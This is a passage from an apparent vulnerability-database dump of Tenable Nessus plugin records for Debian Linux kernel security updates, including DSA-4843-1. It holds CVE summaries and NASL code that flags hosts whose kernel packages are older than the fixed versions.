value:\"p-cpe:/a:debian:debian_linux:linux-image-4.19.0-0.bpo.10-armmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-4.19.0-0.bpo.10-armmp-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-4.19.0-0.bpo.10-armmp-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-4.19.0-0.bpo.10-armmp-lpae-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-4.19.0-0.bpo.10-cloud-amd64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-4.19.0-0.bpo.10-cloud-amd64-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-4.19.0-0.bpo.10-marvell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-4.19.0-0.bpo.10-marvell-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-4.19.0-0.bpo.10-rpi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-4.19.0-0.bpo.10-rpi-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-4.19.0-0.bpo.10-rt-686-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-4.19.0-0.bpo.10-rt-686-pae-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-4.19.0-0.bpo.10-rt-amd64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-4.19.0-0.bpo.10-rt-amd64-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-4.19.0-0.bpo.10-rt-arm64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-4.19.0-0.bpo.10-rt-arm64-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-4.19.0-0.bpo.10-rt-armmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-4.19.0-0.bpo.10-rt-armmp-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-kbuild-4.19\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-perf-4.19\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-source-4.19\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-support-4.19.0-0.bpo.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/12/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/02/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/02/16\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"9.0\", prefix:\"linux-config-4.19\", reference:\"4.19.171-2~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-doc-4.19\", reference:\"4.19.171-2~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.19.0-0.bpo.10-686\", reference:\"4.19.171-2~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.19.0-0.bpo.10-686-pae\", reference:\"4.19.171-2~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.19.0-0.bpo.10-all\", reference:\"4.19.171-2~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.19.0-0.bpo.10-all-amd64\", reference:\"4.19.171-2~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.19.0-0.bpo.10-all-arm64\", reference:\"4.19.171-2~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.19.0-0.bpo.10-all-armel\", reference:\"4.19.171-2~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.19.0-0.bpo.10-all-armhf\", reference:\"4.19.171-2~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.19.0-0.bpo.10-all-i386\", reference:\"4.19.171-2~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.19.0-0.bpo.10-amd64\", reference:\"4.19.171-2~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.19.0-0.bpo.10-arm64\", reference:\"4.19.171-2~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.19.0-0.bpo.10-armmp\", reference:\"4.19.171-2~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.19.0-0.bpo.10-armmp-lpae\", reference:\"4.19.171-2~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.19.0-0.bpo.10-cloud-amd64\", reference:\"4.19.171-2~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.19.0-0.bpo.10-common\", reference:\"4.19.171-2~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.19.0-0.bpo.10-common-rt\", reference:\"4.19.171-2~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.19.0-0.bpo.10-marvell\", reference:\"4.19.171-2~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.19.0-0.bpo.10-rpi\", reference:\"4.19.171-2~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.19.0-0.bpo.10-rt-686-pae\", reference:\"4.19.171-2~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.19.0-0.bpo.10-rt-amd64\", reference:\"4.19.171-2~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.19.0-0.bpo.10-rt-arm64\", reference:\"4.19.171-2~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-headers-4.19.0-0.bpo.10-rt-armmp\", reference:\"4.19.171-2~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.19.0-0.bpo.10-686\", reference:\"4.19.171-2~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.19.0-0.bpo.10-686-dbg\", reference:\"4.19.171-2~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.19.0-0.bpo.10-686-pae\", reference:\"4.19.171-2~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.19.0-0.bpo.10-686-pae-dbg\", reference:\"4.19.171-2~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.19.0-0.bpo.10-amd64\", reference:\"4.19.171-2~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.19.0-0.bpo.10-amd64-dbg\", reference:\"4.19.171-2~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.19.0-0.bpo.10-arm64\", reference:\"4.19.171-2~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.19.0-0.bpo.10-arm64-dbg\", reference:\"4.19.171-2~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.19.0-0.bpo.10-armmp\", reference:\"4.19.171-2~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.19.0-0.bpo.10-armmp-dbg\", reference:\"4.19.171-2~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.19.0-0.bpo.10-armmp-lpae\", reference:\"4.19.171-2~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.19.0-0.bpo.10-armmp-lpae-dbg\", reference:\"4.19.171-2~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.19.0-0.bpo.10-cloud-amd64\", reference:\"4.19.171-2~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.19.0-0.bpo.10-cloud-amd64-dbg\", reference:\"4.19.171-2~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.19.0-0.bpo.10-marvell\", reference:\"4.19.171-2~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.19.0-0.bpo.10-marvell-dbg\", reference:\"4.19.171-2~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.19.0-0.bpo.10-rpi\", reference:\"4.19.171-2~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.19.0-0.bpo.10-rpi-dbg\", reference:\"4.19.171-2~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.19.0-0.bpo.10-rt-686-pae\", reference:\"4.19.171-2~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.19.0-0.bpo.10-rt-686-pae-dbg\", reference:\"4.19.171-2~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.19.0-0.bpo.10-rt-amd64\", reference:\"4.19.171-2~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.19.0-0.bpo.10-rt-amd64-dbg\", reference:\"4.19.171-2~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.19.0-0.bpo.10-rt-arm64\", reference:\"4.19.171-2~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.19.0-0.bpo.10-rt-arm64-dbg\", reference:\"4.19.171-2~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.19.0-0.bpo.10-rt-armmp\", reference:\"4.19.171-2~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-image-4.19.0-0.bpo.10-rt-armmp-dbg\", reference:\"4.19.171-2~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-kbuild-4.19\", reference:\"4.19.171-2~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-perf-4.19\", reference:\"4.19.171-2~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-source-4.19\", reference:\"4.19.171-2~deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"linux-support-4.19.0-0.bpo.10\", reference:\"4.19.171-2~deb9u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-09T18:10:50", "description": "Several vulnerabilities have been discovered in the Linux kernel that\nmay lead to a privilege escalation, denial of service or information\nleaks.\n\n - CVE-2020-27815\n A flaw was reported in the JFS filesystem code allowing\n a local attacker with the ability to set extended\n attributes to cause a denial of service.\n\n - CVE-2020-27825\n Adam 'pi3' Zabrocki reported a use-after-free flaw in\n the ftrace ring buffer resizing logic due to a race\n condition, which could result in denial of service or\n information leak.\n\n - CVE-2020-27830\n Shisong Qin reported a NULL pointer dereference flaw in\n the Speakup screen reader core driver.\n\n - CVE-2020-28374\n David Disseldorp discovered that the LIO SCSI target\n implementation performed insufficient checking in\n certain XCOPY requests. An attacker with access to a LUN\n and knowledge of Unit Serial Number assignments can take\n advantage of this flaw to read and write to any LIO\n backstore, regardless of the SCSI transport settings.\n\n - CVE-2020-29568 (XSA-349)\n Michael Kurth and Pawel Wieczorkiewicz reported that\n frontends can trigger OOM in backends by updating a\n watched path.\n\n - CVE-2020-29569 (XSA-350)\n Olivier Benjamin and Pawel Wieczorkiewicz reported a\n use-after-free flaw which can be triggered by a block\n frontend in Linux blkback. A misbehaving guest can\n trigger a dom0 crash by continuously connecting /\n disconnecting a block frontend.\n\n - CVE-2020-29660\n Jann Horn reported a locking inconsistency issue in the\n tty subsystem which may allow a local attacker to mount\n a read-after-free attack against TIOCGSID.\n\n - CVE-2020-29661\n Jann Horn reported a locking issue in the tty subsystem\n which can result in a use-after-free. A local attacker\n can take advantage of this flaw for memory corruption or\n privilege escalation.\n\n - CVE-2020-36158\n A buffer overflow flaw was discovered in the mwifiex\n WiFi driver which could result in denial of service or\n the execution of arbitrary code via a long SSID value.\n\n - CVE-2021-3347\n It was discovered that PI futexes have a kernel stack\n use-after-free during fault handling. An unprivileged\n user could use this flaw to crash the kernel (resulting\n in denial of service) or for privilege escalation.\n\n - CVE-2021-20177\n A flaw was discovered in the Linux implementation of\n string matching within a packet. A privileged user (with\n root or CAP_NET_ADMIN) can take advantage of this flaw\n to cause a kernel panic when inserting iptables rules.", "edition": 3, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-02-02T00:00:00", "title": "Debian DSA-4843-1 : linux - security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-3347", "CVE-2020-27830", "CVE-2020-27825", "CVE-2020-27815", "CVE-2020-29569", "CVE-2020-36158", "CVE-2020-29568", "CVE-2021-20177", "CVE-2020-29661", "CVE-2020-28374", "CVE-2020-29660"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:10.0", "p-cpe:/a:debian:debian_linux:linux"], "id": "DEBIAN_DSA-4843.NASL", "href": "https://www.tenable.com/plugins/nessus/146052", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4843. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(146052);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/08\");\n\n script_cve_id(\"CVE-2020-27815\", \"CVE-2020-27825\", \"CVE-2020-27830\", \"CVE-2020-28374\", \"CVE-2020-29568\", \"CVE-2020-29569\", \"CVE-2020-29660\", \"CVE-2020-29661\", \"CVE-2020-36158\", \"CVE-2021-20177\", \"CVE-2021-3347\");\n script_xref(name:\"DSA\", value:\"4843\");\n\n script_name(english:\"Debian DSA-4843-1 : linux - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Several vulnerabilities have been discovered in the Linux kernel that\nmay lead to a privilege escalation, denial of service or information\nleaks.\n\n - CVE-2020-27815\n A flaw was reported in the JFS filesystem code allowing\n a local attacker with the ability to set extended\n attributes to cause a denial of service.\n\n - CVE-2020-27825\n Adam 'pi3' Zabrocki reported a use-after-free flaw in\n the ftrace ring buffer resizing logic due to a race\n condition, which could result in denial of service or\n information leak.\n\n - CVE-2020-27830\n Shisong Qin reported a NULL pointer dereference flaw in\n the Speakup screen reader core driver.\n\n - CVE-2020-28374\n David Disseldorp discovered that the LIO SCSI target\n implementation performed insufficient checking in\n certain XCOPY requests. An attacker with access to a LUN\n and knowledge of Unit Serial Number assignments can take\n advantage of this flaw to read and write to any LIO\n backstore, regardless of the SCSI transport settings.\n\n - CVE-2020-29568 (XSA-349)\n Michael Kurth and Pawel Wieczorkiewicz reported that\n frontends can trigger OOM in backends by updating a\n watched path.\n\n - CVE-2020-29569 (XSA-350)\n Olivier Benjamin and Pawel Wieczorkiewicz reported a\n use-after-free flaw which can be triggered by a block\n frontend in Linux blkback. A misbehaving guest can\n trigger a dom0 crash by continuously connecting /\n disconnecting a block frontend.\n\n - CVE-2020-29660\n Jann Horn reported a locking inconsistency issue in the\n tty subsystem which may allow a local attacker to mount\n a read-after-free attack against TIOCGSID.\n\n - CVE-2020-29661\n Jann Horn reported a locking issue in the tty subsystem\n which can result in a use-after-free. A local attacker\n can take advantage of this flaw for memory corruption or\n privilege escalation.\n\n - CVE-2020-36158\n A buffer overflow flaw was discovered in the mwifiex\n WiFi driver which could result in denial of service or\n the execution of arbitrary code via a long SSID value.\n\n - CVE-2021-3347\n It was discovered that PI futexes have a kernel stack\n use-after-free during fault handling. An unprivileged\n user could use this flaw to crash the kernel (resulting\n in denial of service) or for privilege escalation.\n\n - CVE-2021-20177\n A flaw was discovered in the Linux implementation of\n string matching within a packet. A privileged user (with\n root or CAP_NET_ADMIN) can take advantage of this flaw\n to cause a kernel panic when inserting iptables rules.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=970736\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=972345\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=977048\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=977615\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-27815\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-27825\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-27830\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-28374\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-29568\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-29569\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-29660\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-29661\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2020-36158\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-3347\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-20177\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/linux\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/buster/linux\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2021/dsa-4843\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Upgrade the linux packages.\n\nFor the stable distribution (buster), these problems have been fixed\nin version 4.19.171-2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3347\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:10.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/12/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/02/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/02/02\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"10.0\", prefix:\"affs-modules-4.19.0-5-4kc-malta-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"affs-modules-4.19.0-5-5kc-malta-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"affs-modules-4.19.0-5-loongson-3-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"affs-modules-4.19.0-5-octeon-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"ata-modules-4.19.0-5-4kc-malta-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"ata-modules-4.19.0-5-5kc-malta-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"ata-modules-4.19.0-5-armmp-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"ata-modules-4.19.0-5-loongson-3-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"ata-modules-4.19.0-5-powerpc64le-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"btrfs-modules-4.19.0-5-4kc-malta-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"btrfs-modules-4.19.0-5-5kc-malta-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"btrfs-modules-4.19.0-5-armmp-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"btrfs-modules-4.19.0-5-loongson-3-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"btrfs-modules-4.19.0-5-marvell-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"btrfs-modules-4.19.0-5-octeon-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"btrfs-modules-4.19.0-5-powerpc64le-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"btrfs-modules-4.19.0-5-s390x-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"cdrom-core-modules-4.19.0-5-4kc-malta-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"cdrom-core-modules-4.19.0-5-5kc-malta-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"cdrom-core-modules-4.19.0-5-armmp-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"cdrom-core-modules-4.19.0-5-loongson-3-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"cdrom-core-modules-4.19.0-5-marvell-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"cdrom-core-modules-4.19.0-5-octeon-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"cdrom-core-modules-4.19.0-5-powerpc64le-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"cdrom-core-modules-4.19.0-5-s390x-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"compress-modules-4.19.0-5-4kc-malta-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"compress-modules-4.19.0-5-5kc-malta-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"compress-modules-4.19.0-5-armmp-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"compress-modules-4.19.0-5-loongson-3-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"compress-modules-4.19.0-5-marvell-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"compress-modules-4.19.0-5-octeon-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"compress-modules-4.19.0-5-powerpc64le-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"compress-modules-4.19.0-5-s390x-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"crc-modules-4.19.0-5-4kc-malta-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"crc-modules-4.19.0-5-5kc-malta-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"crc-modules-4.19.0-5-armmp-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"crc-modules-4.19.0-5-loongson-3-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"crc-modules-4.19.0-5-marvell-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"crc-modules-4.19.0-5-octeon-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"crc-modules-4.19.0-5-powerpc64le-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"crc-modules-4.19.0-5-s390x-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"crypto-dm-modules-4.19.0-5-4kc-malta-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"crypto-dm-modules-4.19.0-5-5kc-malta-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"crypto-dm-modules-4.19.0-5-armmp-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"crypto-dm-modules-4.19.0-5-loongson-3-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"crypto-dm-modules-4.19.0-5-marvell-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"crypto-dm-modules-4.19.0-5-octeon-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"crypto-dm-modules-4.19.0-5-powerpc64le-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"crypto-dm-modules-4.19.0-5-s390x-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"crypto-modules-4.19.0-5-4kc-malta-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"crypto-modules-4.19.0-5-5kc-malta-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"crypto-modules-4.19.0-5-armmp-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"crypto-modules-4.19.0-5-loongson-3-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"crypto-modules-4.19.0-5-marvell-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"crypto-modules-4.19.0-5-octeon-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"crypto-modules-4.19.0-5-powerpc64le-di\", 